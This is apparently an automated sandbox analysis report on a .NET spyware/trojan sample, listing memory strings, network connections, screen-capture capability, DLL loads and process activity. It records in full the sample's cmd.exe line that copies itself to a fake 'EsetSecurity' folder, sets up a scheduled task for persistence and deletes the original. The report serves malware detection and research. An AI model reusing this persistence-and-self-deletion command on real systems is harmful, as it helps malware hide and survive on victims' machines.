Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Counterfeit.png?fit=300%2C150&amp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Cyber-Threats.jpg?fit=1024%2C512&
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Cyber-Threats.jpg?fit=1200%2C600&
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Cyber-Threats.jpg?fit=300%2C150&a
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-ICS.jpg?fit=1024%2C512&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-ICS.jpg?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-ICS.jpg?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-ICS.jpg?fit=300%2C150&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=1024%2C512&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-U.S.png?fit=300%2C150&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://js.hs-scripts.com/21289959.js?integration=WordPress&ver=11.1.73
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nitroscripts.com/JPtKKXLsjJbtelUWnenRbIbVJOerqPTK
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://odin.io
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://odin.io/#pricing
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogp.me/ns#
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partnercentral.cyble.com/login
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partnercentral.cyble.com/partner/registration
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partnernetwork.cyble.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rankmath.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rankmath.com/wordpress/plugin/seo-suite/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s.adroll.com/j/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s0.wp.com/wp-content/js/bilmur.min.js?m=202448
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stats.wp.com/e-202448.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thecyberexpress.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://thecyberexpress.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://to.getnitropack.com/p
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trust.cyble.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/cybleglobal
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/x/migrate?tok=7b2265223a222f663130526b4b3631774e3f3139373d30222c2274223a31373333
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5267C000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E8000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AB000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter3e4tixl4xyajtrzo62zg5vztmjuricljdp2c5kshju4avyoid.onion/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://unpkg.co/gsap
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://unpkg.com/gsap
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wordpress.com/email-subscriptions
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wordpress.org/
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wpadvancedads.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cyble.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cyble.com/products/cyble-vision
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.g2.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.g2.com/assets/write_a_review_entry.js
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-4FJGSRPM4S
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-PMWT557
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.linkedin.com/company/cyble-global/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://x.com
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B5276B000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52670000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://x.com/f10RkK61wN?197=0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 159.69.63.226:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.69.63.226:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.244.42.129:443 -> 192.168.2.16:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.0.78.152:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.16:49770 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: tDLozbx48F.exe, wdZP.cs	.Net Code: p0
Source: tDLozbx48F.exe.1.dr, wdZP.cs	.Net Code: p0

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Process Stats: CPU usage > 24%

Source: tDLozbx48F.exe, 00000001.00000000.1247226284.0000022E48592000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameJ73d279b82e4387f5da7f.exel& vs tDLozbx48F.exe
Source: tDLozbx48F.exe	Binary or memory string: OriginalFilenameJ73d279b82e4387f5da7f.exel& vs tDLozbx48F.exe
Source: tDLozbx48F.exe.1.dr	Binary or memory string: OriginalFilenameJ73d279b82e4387f5da7f.exel& vs tDLozbx48F.exe

Source: tDLozbx48F.exe.1.dr, avd.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: tDLozbx48F.exe.1.dr, avd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: tDLozbx48F.exe, avd.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: tDLozbx48F.exe, avd.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/2@11/20

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

File created: C:\Users\user\AppData\Local\EsetSecurity

Jump to behavior

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Mutant created: \Sessions\1\BaseNamedObjects\rauwloiiak
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2560.tmp

Jump to behavior

Source: tDLozbx48F.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: tDLozbx48F.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tDLozbx48F.exe

ReversingLabs: Detection: 91%

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

File read: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe"
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe" &&START "" "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "tDLozbx48F" /sc MINUTE /tr "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe" /rl LIMITED /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe "C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe"	Jump to behavior

Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Downloads\ojBXnKSgmZ\tDLozbx48F.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Section loaded: mscoree.dll	Jump to behavior
